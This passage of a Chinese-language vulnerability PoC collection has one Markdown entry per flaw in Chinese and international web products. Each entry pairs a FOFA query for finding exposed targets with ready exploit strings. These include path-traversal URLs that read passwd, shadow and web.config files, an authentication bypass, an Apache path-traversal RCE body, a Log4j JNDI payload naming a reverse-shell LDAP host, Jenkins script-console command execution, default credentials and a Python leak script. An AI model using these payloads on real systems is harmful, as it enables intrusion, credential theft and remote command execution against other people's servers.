30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101957569.png) 32 | 33 | 34 | 35 | Url为 36 | 37 | 38 | 39 | ```plain 40 | http://xxx.xxx.xxx.xxx/prod-api/druid/index.html 41 | ``` 42 | 43 | 44 | 45 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101957317.png) 46 | 47 | ## -------------------------------------------------------------------------------- /Web应用漏洞/蓝海卓越计费管理系统 debug.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 蓝海卓越计费管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title=="蓝海卓越计费管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101853490.png) 26 | 27 | 28 | 29 | 漏洞代码 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101853603.png) 34 | 35 | 36 | 37 | 访问 debug.php页面 远程调试命令执行 38 | 39 | 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101853251.png) -------------------------------------------------------------------------------- /Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md: -------------------------------------------------------------------------------- 1 | # 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336 2 | 3 | ## 漏洞描述 4 | 5 | 金笛 短信中间件Web版后台存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 金笛 短信中间件Web版 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="金笛短信中间件(WEB版)" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525150803211](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508287.png) 24 | 25 | 存在漏洞的位置为 日志下载 26 | 27 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508351.png) 28 | 29 | 验证POC 30 | 31 | ``` 32 | /log?action=view&pageIndex=1&name=../../../windows/win.ini 33 | ``` 34 | 35 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508651.png) -------------------------------------------------------------------------------- /Web应用漏洞/银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437.md: -------------------------------------------------------------------------------- 1 | # 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437 2 | 3 | ## 漏洞描述 4 | 5 | 银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 银澎云计算 好视通视频会议系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Hanming-Video-Conferencing" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101930170.png) 26 | 27 | 28 | 29 | 漏洞Url为 30 | 31 | 32 | 33 | ```plain 34 | https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini 35 | ``` 36 | 37 | 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101930402.png) 40 | 41 | 42 | 43 | ## -------------------------------------------------------------------------------- /Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 银达汇智 智慧综合管理平台 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "汇智信息" && title="智慧综合管理平台登入" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![image-20220525150952244](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251509315.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config 29 | ``` 30 | 31 | ![image-20220525151256759](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251512861.png) -------------------------------------------------------------------------------- /Web应用漏洞/阿尔法科技 虚拟仿真实验室 未授权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 阿尔法科技 虚拟仿真实验室 未授权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 阿尔法科技 虚拟仿真实验室 存在未授权访问漏洞,通过访问构造的Url可以获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 虚拟仿真实验室 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="河南阿尔法科技有限公司" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 未授权的Url为 22 | 23 | ```plain 24 | /admin/student/studentlist.html?page=1 25 | ``` 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101929331.png) 28 | 29 | 30 | 31 | 成功获取所有用户的账号密码信息 32 | 33 | ## 参考文章 34 | 35 | http://www.0dayhack.net/index.php/1702/ -------------------------------------------------------------------------------- /Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md: -------------------------------------------------------------------------------- 1 | # 魅课 OM视频会议系统 proxy.php 文件包含漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 魅课OM视频会议系统 proxy.php文件target参数存在本地文件包含漏洞。攻击者可借助该漏洞无需登录便可下载任意文件。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 魅课OM视频会议系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="OMEETING-OM视频会议" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220525153028849](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251530024.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini 29 | ``` 30 | 31 | ![image-20220525153105283](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251531338.png) -------------------------------------------------------------------------------- /Web应用漏洞/齐治堡垒机 gui_detail_view.php 任意用户登录漏洞.md: -------------------------------------------------------------------------------- 1 | # 齐治堡垒机 gui_detail_view.php 任意用户登录漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 齐治堡垒机 存在任意用户登录漏洞,访问特定的Url即可获得后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 齐治堡垒机 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="齐治科技-堡垒机" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 漏洞POC为 22 | 23 | ```plain 24 | http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 25 | ``` 26 | 27 | 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101931947.png) 30 | 31 | ## -------------------------------------------------------------------------------- /Web应用漏洞/龙璟科技 电池能量BEMS downloads 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 龙璟科技 电池能量BEMS downloads 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 龙璟科技 电池能量BEMS 存在接口可任意文件下载获取服务器任意文件信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 龙璟科技 电池能量BEMS 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title=电池能量管理系统 BEMS 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101906850.png) 24 | 25 | 验证POC 26 | 27 | ```plain 28 | /api/downloads?fileName=../../../../../../../../etc/shadow 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101906628.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache ActiveMQ Console控制台默认弱口令.md: -------------------------------------------------------------------------------- 1 | # Apache ActiveMQ Console控制台默认弱口令 2 | 3 | ## 漏洞描述 4 | 5 | Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache ActiveMQ 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | Apache ActiveMQ 默认开启了 8186 控制台 16 | 17 | 访问目标: http://xxx.xxx.xxx.xxx:8161/admin 18 | 19 | ![6fdafa69-51e4-4215-aa0d-0c912e47ba6c](https://typora-1308934770.cos.ap-beijing.myqcloud.com/6fdafa69-51e4-4215-aa0d-0c912e47ba6c.png) 20 | 21 | 使用默认口令 admin:admin 22 | 23 | ![7dc4d568-31b4-494e-8c32-3a465830ff3c](https://typora-1308934770.cos.ap-beijing.myqcloud.com/7dc4d568-31b4-494e-8c32-3a465830ff3c.png) 24 | -------------------------------------------------------------------------------- /Web服务器漏洞/Apache HTTPd 换行解析漏洞 CVE-2017-15715.md: -------------------------------------------------------------------------------- 1 | # Apache HTTPd 换行解析漏洞 CVE-2017-15715 2 | 3 | ## 漏洞描述 4 | 5 | Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache HTTPd 2.4.0~2.4.29版本 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | ```plain 16 | https://github.com/vulhub/vulhub.git 17 | cd vulhub/httpd/CVE-2017-15715 18 | docker-compose up -d 19 | ``` 20 | 21 | 访问 http://xxx.xxx.xxx.xxx:8080 正常即可 22 | 23 | ## 漏洞复现 24 | 25 | 直接上传恶意文件会被拦截 26 | 27 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090039601.png) 28 | 29 | 抓包修改如下参数 30 | 31 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090039868.png) 32 | 33 | ![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090039120.png) 34 | 35 | 响应为200,成功绕过 36 | 37 | 访问 [http://xxx.xxx.xxx.xxx:8080/evil.php ](http://xxx.xxx.xxx.xxx:8080/evil.php ) 成功触发解析漏洞 38 | 39 | ![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090039233.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-41773.md: -------------------------------------------------------------------------------- 1 | # Apache HTTPd 路径穿越漏洞 CVE-2021-41773 2 | 3 | ## 漏洞描述 4 | 5 | Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache HTTPd 2.4.49~2.4.50版本 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | server="Apache/2.4.49" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | Chorme插件Wappalyzer获取 Apache版本 22 | 23 | ![image-20220525155347737](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251554093.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 29 | ``` 30 | 31 | ![image-20220525155515446](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251555506.png) 32 | 33 | 开启CGI的情况下可RCE 34 | 35 | ``` 36 | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 37 | 38 | B=|id>/tmp/id_txt 39 | ``` -------------------------------------------------------------------------------- /Web服务器漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-42013.md: -------------------------------------------------------------------------------- 1 | # Apache HTTPd 路径穿越漏洞 CVE-2021-42013 2 | 3 | ## 漏洞描述 4 | 5 | Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件 (CVE-2021-41773 的漏洞绕过) 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache HTTPd 2.4.49~2.4.50版本 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | server="Apache/2.4.49" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | Chorme插件Wappalyzer获取 Apache版本 22 | 23 | ![image-20220525155347737](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251553798.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 29 | ``` 30 | 31 | ![image-20220525155420331](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251554399.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache Kylin config 未授权配置泄露 CVE-2020-13937.md: -------------------------------------------------------------------------------- 1 | # Apache Kylin config 未授权配置泄露 CVE-2020-13937 2 | 3 | ## 漏洞描述 4 | 5 | Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息 6 | 7 | ## FOFA 8 | 9 | ``` 10 | app="APACHE-kylin" 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | ``` 16 | docker pull apachekylin/apache-kylin-standalone:3.0.1 17 | 18 | docker run -d \ 19 | -m 8G \ 20 | -p 7070:7070 \ 21 | -p 8088:8088 \ 22 | -p 50070:50070 \ 23 | -p 8032:8032 \ 24 | -p 8042:8042 \ 25 | -p 16010:16010 \ 26 | apachekylin/apache-kylin-standalone:3.0.1 27 | ``` 28 | 29 | 打开后使用默认账号密码admin/KYLIN登录,出现初始界面即为成功 30 | 31 | ![image-20220525161044773](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251610838.png) 32 | 33 | ## 漏洞复现 34 | 35 | 漏洞验证POC 36 | 37 | ``` 38 | /kylin/api/admin/config 39 | ``` 40 | 41 | ![image-20220525161140820](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251611885.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580.md: -------------------------------------------------------------------------------- 1 | # Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580 2 | 3 | ## 漏洞描述 4 | 5 | Apache ShenYu Admin爆出身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。 Apache ShenYu 是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache ShenYu 2.3.0 11 | Apache ShenYu 2.4.0 12 | ``` 13 | 14 | ## FOFA 15 | 16 | ``` 17 | title=="ShenYu Gateway" 18 | ``` 19 | 20 | ## 漏洞复现 21 | 22 | 登录页面 23 | 24 | ![image-20220525161442379](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251614427.png) 25 | 26 | 验证POC 27 | 28 | ``` 29 | /dashboardUser 30 | ``` 31 | 32 | ![image-20220525161531420](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251615480.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache Solr Log4j组件 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Apache Solr Log4j组件 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Apache Solr Log4j组件 远程命令执行漏洞,详情略 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache Solr 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="APACHE-Solr" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251622273.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251622876.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache Zeppelin 未授权任意命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Apache Zeppelin 未授权任意命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Apache Zeppelin 存在未授权的用户访问命令执行接口,导致了任意用户都可以执行恶意命令获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache Zeppelin 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="960250052" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 含有漏洞的页面如下 22 | 23 | ![image-20220209122046358](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091220423.png) 24 | 25 | 26 | 27 | 点击 创建一个匿名用户在用户页面执行命令即可 28 | 29 | ![image-20220209122110291](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091221386.png) -------------------------------------------------------------------------------- /Web服务器漏洞/Apache ZooKeeper 未授权访问漏洞 CVE-2014-085漏洞描述.md: -------------------------------------------------------------------------------- 1 | # Apache ZooKeeper 未授权访问漏洞 CVE-2014-085漏洞描述 2 | 3 | ## 漏洞描述 4 | 5 | 默认安装配置完的zookeeper允许未授权访问,管理员未配置访问控制列表(ACL)。导致攻击者可以在默认开放的2181端口下通过执行envi命令获得大量敏感信息(系统名称、java环境)导致任意用户可以在网络不受限的情况下进行未授权访问读取数据 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Apache ZooKeeper 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | Apache ZooKeeper 默认开放 2181端口 ,使用如下命令获取敏感数据 16 | 17 | ```shell 18 | echo envi | nc xxx.xxx.xxx.xxx 2181 19 | ``` 20 | 21 | ![image-20220209122400884](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091224952.png) 22 | 23 | 其他信息 24 | 25 | ```shell 26 | 1、stat:列出关于性能和连接的客户端的统计信息。 27 | echo stat |ncat 127.0.0.1 2181 28 | 29 | 2、ruok:测试服务器是否运行在非错误状态。 30 | echo ruok |ncat 127.0.0.1 2181 31 | 32 | 3、reqs:列出未完成的请求。 33 | echo reqs |ncat 127.0.0.1 2181 34 |    35 | 4、envi:打印有关服务环境的详细信息。 36 | echo envi |ncat 127.0.0.1 2181 37 |    38 | 5、dump:列出未完成的会话和临时节点。 39 | echo dump |ncat 127.0.0.1 2181 40 | ``` -------------------------------------------------------------------------------- /Web服务器漏洞/GoCD plugin 任意文件读取漏洞 CVE-2021-43287.md: -------------------------------------------------------------------------------- 1 | # GoCD plugin 任意文件读取漏洞 CVE-2021-43287 2 | 3 | ## 漏洞描述 4 | 5 | *GoCD*,一个开源的持续集成和持续交付系统,可以在持续交付过程中执行编译,自动化测试,自动部署等等,与Jenkins类似。 6 | 7 | GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | GoCD 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="Create a pipeline - Go" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 主页面 24 | 25 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251627593.png) 26 | 27 | 验证POC 28 | 29 | ``` 30 | /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 31 | ``` 32 | 33 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251627131.png) -------------------------------------------------------------------------------- /Web服务器漏洞/JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504.md: -------------------------------------------------------------------------------- 1 | # JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504 2 | 3 | ## 漏洞描述 4 | 5 | Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 6 | 7 | ## 影响版本 8 | 9 | ``` 10 | JBoss AS 4.x及之前版本 11 | ``` 12 | 13 | ## 环境搭建 14 | 15 | ```plain 16 | https://github.com/vulhub/vulhub.git 17 | cd vulhub/jboss/CVE-2017-7504 18 | docker-compose build 19 | docker-compose up -d 20 | ``` 21 | 22 | ## 漏洞复现 23 | 24 | 访问控制台 25 | 26 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1627121334280-904d0c7a-4bc8-46ee-a4f2-6fe9939c2237.png) 27 | 28 | 使用工具 [Jexboss](https://github.com/joaomatosf/jexboss) 进行漏洞扫描 29 | 30 | ```plain 31 | python3 jexboss.py -host http://192.168.51.133:8080 32 | ``` 33 | 34 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1627121338258-e1128eab-4a37-4915-8c7b-584c0baea8d1.png) 35 | 36 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1627121342813-aab7d6da-b925-451f-9abb-49f03eb53c84.png) 37 | 38 | 成功利用漏洞执行命令 -------------------------------------------------------------------------------- /Web服务器漏洞/Jenkins script 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Jenkins script 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Jenkins 登录后访问 /script 页面,其中存在命令执行漏洞,当存在未授权的情况时导致服务器被入侵 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Jenkins 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Jenkins" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 账号密码存在于: 22 | 23 | ``` 24 | Linux: /var/lib/jenkins/secrets/initialAdminPassword 25 | Windows: C:\Users\RabbitMask\.jenkins\secrets\initialAdminPassword 26 | ``` 27 | 28 | 登录后台,或在未授权的情况下访问 29 | 30 | ``` 31 | http://xxx.xxx.xxx.xxx/script 32 | ``` 33 | 34 | 在脚本命命令模块执行系统命令 35 | 36 | ``` 37 | println 'cat /etc/passwd'.execute().text 38 | ``` 39 | 40 | ![image-20220525163148014](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251631073.png) -------------------------------------------------------------------------------- /Web服务器漏洞/PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md: -------------------------------------------------------------------------------- 1 | # PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381 2 | 3 | ## 漏洞描述 4 | 5 | PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取,获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Payara Micro Community 5.2021.6 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Payara-Micro" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 产品页面 22 | 23 | ![image-20220525163706617](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251637689.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /.//WEB-INF/classes/META-INF/microprofile-config.properties 29 | ``` 30 | 31 | ![image-20220525163715004](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251637074.png) -------------------------------------------------------------------------------- /Web服务器漏洞/WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371.md: -------------------------------------------------------------------------------- 1 | # WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371 2 | 3 | ## 漏洞描述 4 | 5 | 2022年1月19日,绿盟科技CERT监测发现Oracle官方发布了1月关键补丁更新公告CPU(Critical Patch Update),此次共修复了497个不同程度的漏洞,此次安全更新涉及Oracle WebLogic Server、Oracle MySQL、Oracle Java SE、Oracle FusionMiddleware、Oracle Retail Applications等多个常用产品。Oracle强烈建议客户尽快应用关键补丁更新修复程序,对漏洞进行修复。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | WebLogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | 验证POC 16 | 17 | ``` 18 | .//META-INF/MANIFEST.MF 19 | .//WEB-INF/web.xml 20 | .//WEB-INF/portlet.xml 21 | .//WEB-INF/weblogic.xml 22 | ``` -------------------------------------------------------------------------------- /Web服务器漏洞/Zabbix SAML身份绕过漏洞 CVE-2022-23131.md: -------------------------------------------------------------------------------- 1 | # Zabbix SAML身份绕过漏洞 CVE-2022-23131 2 | 3 | ## 漏洞描述 4 | 5 | Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决方案非常相似。由于其受欢迎程度、功能和在大多数公司网络中的特权地位,Zabbix 是威胁参与者的高调目标。一家公共漏洞经纪人,一家专门从事安全漏洞获取的公司,也公开宣布了他们对该软件的兴趣。 6 | 7 | 我们在 Zabbix 的客户端会话实现中发现了一个严重漏洞,该漏洞可能导致整个网络遭到破坏。在本文中,我们介绍了不同类型的会话存储,并讨论了实现安全的原因。然后,我们描述了我们在 Zabbix 中发现的漏洞的技术细节、其影响以及如何预防。让我们深入了解它! 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | Zabbix 13 | ``` 14 | 15 | ## 网络测绘 16 | 17 | ``` 18 | app="ZABBIX-监控系统" && body="saml" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 登录页面 24 | 25 | ![image-20220525164121127](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251641192.png) 26 | 27 | 通过POC获取 zbx_session 28 | 29 | ![image-20220525164958773](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251649824.png) 30 | 31 | 替换后点击 SAML登录 32 | 33 | ![image-20220525165011891](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251650948.png) 34 | 35 | ![image-20220525165021140](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251650185.png) -------------------------------------------------------------------------------- /开发框架漏洞/MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568.md: -------------------------------------------------------------------------------- 1 | # MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568 2 | 3 | ## 漏洞描述 4 | 5 | *motionEye*是用Python写的motion的Web前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的URL即可获取服务器敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | MotionEye <= v0.42.1 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | banner="motionEye" 17 | 18 | app="motionEye" 19 | app="motionEye-摄像头服务器" 20 | app="motionEye/0.39.3" 21 | app="motionEye/0.40" 22 | app="motionEye01" 23 | app="motionEye/0.33" 24 | app="motionEye/0.35" 25 | ``` 26 | 27 | ## 漏洞复现 28 | 29 | 通过查看响应Server判断是否使用,访问路由`/config/list` 30 | 31 | ## 漏洞POC 32 | 33 | ```python 34 | import sys 35 | import json 36 | import requests 37 | def exp(url): 38 | if url[-1] == "/": 39 | url = url + "config/list" 40 | else: 41 | url = url + "/config/list" 42 | rus = requests.get(url, verify=False) 43 | print("信息泄露内容:") 44 | print(json.dumps(json.loads(rus.text), sort_keys=True, indent=4)) 45 | if __name__ == '__main__': 46 | ip = sys.argv[1] 47 | print("访问IP:{0}".format(ip)) 48 | exp(ip) 49 | ``` 50 | 51 | -------------------------------------------------------------------------------- /开发框架漏洞/PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841.md: -------------------------------------------------------------------------------- 1 | # PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841 2 | 3 | ## 漏洞描述 4 | 5 | PHPUnit5.6.3之前的版本,存在一处远程代码执行漏洞,利用漏洞可以获取服务器敏感信息及权限。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | PHPUnit < 5.6.3 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | 漏洞位于 /phpunit/src/Util/PHP/eval-stdin.php 16 | 17 | 其中关键代码为: 18 | 19 | ```plain 20 | eval('?>'.file_get_contents('php://input')); 21 | ``` 22 | 23 | 发送如下请求包执行PHP代码 24 | 25 | ```plain 26 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 27 | Host: 28 | Content-Length: 21 29 | Accept-Encoding: gzip 30 | ``` 31 | 32 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091319138.png) -------------------------------------------------------------------------------- /开发框架漏洞/Rails Accept 任意文件读取漏洞 CVE-2019-5418.md: -------------------------------------------------------------------------------- 1 | # Rails Accept 任意文件读取漏洞 CVE-2019-5418 2 | 3 | ## 漏洞描述 4 | 5 | Ruby on Rails是一个 Web 